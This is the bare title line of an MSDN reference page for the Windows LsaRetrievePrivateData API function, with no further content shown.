MSDN - LsaRetrievePrivateData API Function: LsaRetrievePrivateData Function (Windows)